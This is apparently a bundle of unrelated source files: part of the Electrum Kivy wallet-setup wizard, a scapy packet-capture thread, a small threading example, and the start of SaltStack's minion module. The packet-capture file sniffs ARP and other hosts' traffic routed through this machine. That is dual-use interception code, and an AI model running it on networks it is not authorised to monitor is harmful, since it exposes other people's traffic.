Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<WizardConfirmDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
<WizardTOSDialog>
message : ''
size_hint: 1, 1
ScrollView:
size_hint: 1, 1
TextInput:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.minimum_height
text: root.message
disabled: True
<WizardEmailDialog>
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: 'Please enter your email address'
WizardTextInput:
id: email
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<WizardKnownOTPDialog>
message : ''
message2: ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
Widget
size_hint: 1, 1
height: '48sp'
BoxLayout:
orientation: 'horizontal'
WizardButton:
id: cb
text: _('Request new secret')
on_release: root.request_new_secret()
size_hint: 1, None
WizardButton:
id: abort
text: _('Abort creation')
on_release: root.abort_wallet_creation()
size_hint: 1, None
<WizardNewOTPDialog>
message : ''
message2 : ''
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
QRCodeWidget:
id: qr
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://electrum/gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://electrum/gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
_trigger_size_dialog = Clock.create_trigger(self._size_dialog)
Window.bind(size=_trigger_size_dialog,
rotation=_trigger_size_dialog)
_trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_dismiss(self):
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardOTPDialogBase(WizardDialog):
def get_otp(self):
otp = self.ids.otp.text
if len(otp) != 6:
return
try:
return int(otp)
except:
return
def on_text(self, dt):
self.ids.next.disabled = self.get_otp() is None
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardKnownOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
self.message = _("This wallet is already registered with TrustedCoin. To finalize wallet creation, please enter your Google Authenticator Code.")
self.message2 =_("If you have lost your Google Authenticator account, you can request a new secret. You will need to retype your seed.")
self.request_new = False
def get_params(self, button):
return (self.get_otp(), self.request_new)
def request_new_secret(self):
self.request_new = True
self.on_release(True)
def abort_wallet_creation(self):
self._on_release = True
os.unlink(self.path)
self.wizard.terminate()
self.dismiss()
class WizardNewOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
otp_secret = kwargs['otp_secret']
uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
self.message = "Please scan the following QR code in Google Authenticator. You may also use the secret key: %s"%otp_secret
self.message2 = _('Then, enter your Google Authenticator code:')
self.ids.qr.set_data(uri)
def get_params(self, button):
return (self.get_otp(), False)
class WizardTOSDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.text = 'Accept'
self.ids.next.disabled = False
self.message = kwargs['tos']
self.message2 = _('Enter your email address:')
class WizardEmailDialog(WizardDialog):
def get_params(self, button):
return (self.ids.email.text,)
def on_text(self, dt):
self.ids.next.disabled = not is_valid_email(self.ids.email.text)
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardConfirmDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardConfirmDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
self.value = 'ok'
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (True,)
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum.mnemonic import Mnemonic
from electrum.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and bool(last_word)
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
def is_valid(x):
try:
return kwargs['is_valid'](x)
except:
return False
self.is_valid = is_valid
self.title = kwargs['title']
self.message = kwargs['message']
self.allow_multi = kwargs.get('allow_multi', False)
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
if self.allow_multi:
self.ids.text_input.text += text + '\n'
else:
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard is done creating/ restoring
wallet/s.
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg, on_finished=None):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
if on_finished:
def protected_on_finished():
try:
on_finished()
except Exception as e:
self.show_error(str(e))
Clock.schedule_once(lambda dt: protected_on_finished(), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://electrum/gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, *, storage=None):
if storage is None:
storage = self.create_storage(self.path)
self.dispatch('on_wizard_complete', storage)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def confirm_dialog(self, **kwargs):
WizardConfirmDialog(self, **kwargs).open()
def tos_dialog(self, **kwargs):
WizardTOSDialog(self, **kwargs).open()
def email_dialog(self, **kwargs):
WizardEmailDialog(self, **kwargs).open()
def otp_dialog(self, **kwargs):
if kwargs['otp_secret']:
WizardNewOTPDialog(self, **kwargs).open()
else:
WizardKnownOTPDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.')
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_message(self, msg): self.show_error(msg)
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def request_password(self, run_next, force_disable_encrypt_cb=False):
if force_disable_encrypt_cb:
# do not request PIN for watching-only wallets
run_next(None, False)
return
def on_success(old_pin, pin):
assert old_pin is None
run_next(pin, False)
def on_failure():
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
popup = PasswordDialog()
app = App.get_running_app()
popup.init(app, None, _('Choose PIN code'), on_success, on_failure, is_change=2)
popup.open()
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
packet_capture.py
|
"""
Thread that continuously captures and processes packets.
"""
import scapy.all as sc
import threading
import utils
from host_state import HostState
import time
class PacketCapture(object):
def __init__(self, host_state):
assert isinstance(host_state, HostState)
self._host_state = host_state
self._lock = threading.Lock()
self._active = True
self._thread = threading.Thread(target=self._capture_packets)
self._thread.daemon = True
def start(self):
with self._lock:
self._active = True
utils.log('[Packet Capture] Starting.')
self._thread.start()
def _capture_packets(self):
while True:
result = utils.safe_run(sc.sniff, kwargs={
'prn': self._host_state.packet_processor.process_packet,
'stop_filter': lambda _: not self._is_active(),
'filter': 'arp or (host not {} and ether host {})'.format(
self._host_state.host_ip,
self._host_state.host_mac
),
'timeout': 30
})
if isinstance(result, utils._SafeRunError):
time.sleep(1)
def _is_active(self):
with self._lock:
return self._active
def stop(self):
utils.log('[Packet Capture] Stopping.')
with self._lock:
self._active = False
self._thread.join()
utils.log('[Packet Capture] Stopped.')
|
multiThreading.py
|
import threading, time
print('Start of program.')
def takeANap():
time.sleep(5)
print('Wake up!')
threadObj = threading.Thread(target=takeANap)
threadObj.start()
print('End of Program.')
print('-' * 40)
threadObj2 = threading.Thread(target=print, args=['Cats', 'Dogs', 'Frogs'], kwargs={'sep': ' & '})
threadObj2.start()
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.context
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.executors import FUNCTION_EXECUTORS
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.process import default_signals, SignalHandlingMultiprocessingProcess
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def prep_ip_port(opts):
ret = {}
if opts['master_uri_format'] == 'ip_only':
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(":", 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: ::1:1234
ret['master'] = ip_port[0]
ret['master_port'] = ip_port[1]
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons')
if b_conf:
return self.beacons.process(b_conf) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise TypeError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
except TypeError:
msg = ('Failed to evaluate master address from '
'module \'{0}\''.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
shuffle(opts['master'])
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], str) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Removing possibly failed master {0} from list of'
' masters'.format(opts['master']))
# create new list of master with the possibly failed one removed
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
